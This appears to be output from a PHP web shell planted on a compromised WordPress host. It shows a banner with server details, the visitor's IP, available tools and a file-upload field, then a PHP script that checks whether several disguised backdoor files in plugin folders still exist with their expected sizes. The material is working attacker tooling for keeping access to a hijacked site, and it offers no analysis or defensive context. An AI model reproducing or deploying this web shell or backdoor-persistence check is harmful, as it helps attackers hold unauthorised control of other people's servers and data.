| Server IP : 145.239.37.162 / Your IP : 216.73.217.126 Web Server : Apache System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaa ( 38250) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/v/e/r/verseaa/www/wp-content/plugins/social_1785900290/build/ |
Upload File : |
<?php $r = '/home/verseaa/www'; $x = ["/wp-content/plugins/widget_1785838784/inc/bottom-1785838784.php"=>"bd@@188678@@822",
"/wp-content/plugins/custom_1786192153/bottom_1786192153.php"=>"bd@@237902@@1089",
"/wp-content/plugins/widget_1785838784/inc/bottom-1785838784.php"=>"bd@@192099@@822",
"/wp-content/plugins/widget_1785838784/inc/bottom-1785838784.php"=>"bd@@185191@@822",
"/wp-content/plugins/widget_1785838784/inc/bottom-1785838784.php"=>"bd@@182170@@822",
"/wp-content/plugins/widget_1785838784/inc/bottom-1785838784.php"=>"bd@@195488@@822",
"/wp-content/plugins/social_1785900290/build/bottom-1785900290.php"=>"bd@@204740@@905"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');